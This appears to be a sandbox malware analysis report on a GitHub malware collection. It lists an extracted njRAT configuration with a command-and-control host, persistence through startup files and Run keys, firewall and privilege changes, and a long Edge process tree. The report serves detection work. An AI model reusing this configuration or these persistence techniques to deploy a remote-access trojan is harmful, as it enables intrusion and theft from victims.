Analysis
-
max time kernel
425s -
max time network
509s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system -
submitted
12-12-2024 12:51
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Viper4K/malware/tree/master/MEMZ
Resource
win10v2004-20241007-en
Errors
General
-
Target
https://github.com/Viper4K/malware/tree/master/MEMZ
Malware Config
Extracted
njrat
0.7d
Slaves
hom135.ddns.net:100
d4903fdacbb79e6cd1109a741a2bc821
d4903fdacbb79e6cd1109a741a2bc821
-
reg_key
d4903fdacbb79e6cd1109a741a2bc821
-
splitter
|'|'|
Signatures
-
Njrat family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4716 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation M.exe -
Drops startup file 5 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4903fdacbb79e6cd1109a741a2bc821.exe | server.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4903fdacbb79e6cd1109a741a2bc821.exe | server.exe
File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\x.vbs | taskmgr.exe
-
Executes dropped EXE 5 IoCs
pid Process 3944 M.exe 3728 M.exe 1436 server.exe 4888 server.exe 1528 A4C3D1C6E1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 9 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d4903fdacbb79e6cd1109a741a2bc821 = "\"C:\\Users\\Admin\\AppData\\Roaming\\server.exe\" .." | server.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\d4903fdacbb79e6cd1109a741a2bc821 = "\"C:\\Users\\Admin\\AppData\\Roaming\\server.exe\" .." | server.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" | 1002.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" | A4C3D1C6E1.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" | A4C3D1C6E1.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | NjRAT 0.7d.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" | 1002.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" | 1003.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*A4C3D1C6E1 = "C:\\Users\\Admin\\AppData\\Roaming\\A4C3D1C6E1.exe" | 1003.exe
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/1872-645-0x0000000000400000-0x00000000004B8000-memory.dmp autoit_exe behavioral1/memory/1872-661-0x0000000000400000-0x00000000004B8000-memory.dmp autoit_exe -
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 3944 set thread context of 3728 | 3944 | M.exe | 130
PID 1436 set thread context of 4888 | 1436 | server.exe | 135
-
resource yara_rule behavioral1/memory/3944-377-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/files/0x0008000000023de8-376.dat upx behavioral1/memory/3944-417-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/memory/1436-434-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/memory/1872-640-0x0000000000400000-0x00000000004B8000-memory.dmp upx behavioral1/memory/1872-645-0x0000000000400000-0x00000000004B8000-memory.dmp upx behavioral1/memory/1872-661-0x0000000000400000-0x00000000004B8000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempts to find local system groups and permission settings.
-
Program crash 1 IoCs
pid pid_target Process procid_target 5552 1800 WerFault.exe 200 -
System Location Discovery: System Language Discovery 1 TTPs 32 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5900 PING.EXE 5664 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 4344 taskkill.exe -
Modifies registry class 64 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5664 PING.EXE 5900 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4888 server.exe 1872 DELmE_s Batch Virus Generator v 2.0.exe 516 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3944 M.exe 3944 M.exe 1436 server.exe 1436 server.exe 5108 DarkHorseTrojanVirusMaker.exe 5108 DarkHorseTrojanVirusMaker.exe 4736 Backdoor.exe 748 Backdoor(np).exe 1872 DELmE_s Batch Virus Generator v 2.0.exe 1872 DELmE_s Batch Virus Generator v 2.0.exe 1800 666.exe 5836 MasterSlave.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Viper4K/malware/tree/master/MEMZ1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847182⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:22⤵PID:1260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:82⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:82⤵PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:12⤵PID:3336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:3892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5464 /prefetch:82⤵PID:2308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:12⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3148 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2292 /prefetch:12⤵PID:1248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵PID:4832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1848 /prefetch:12⤵PID:2028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:12⤵PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:12⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6884 /prefetch:82⤵PID:2144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:12⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:12⤵PID:1344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:12⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:12⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵PID:4252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:1724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:12⤵PID:5900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7812 /prefetch:12⤵PID:6244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8540 /prefetch:12⤵PID:6332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7612 /prefetch:12⤵PID:6732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:12⤵PID:6848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:12⤵PID:6920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:12⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:12⤵PID:6560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8444 /prefetch:12⤵PID:1320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8920 /prefetch:12⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8840 /prefetch:12⤵PID:1664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9112 /prefetch:12⤵PID:7956
-
-
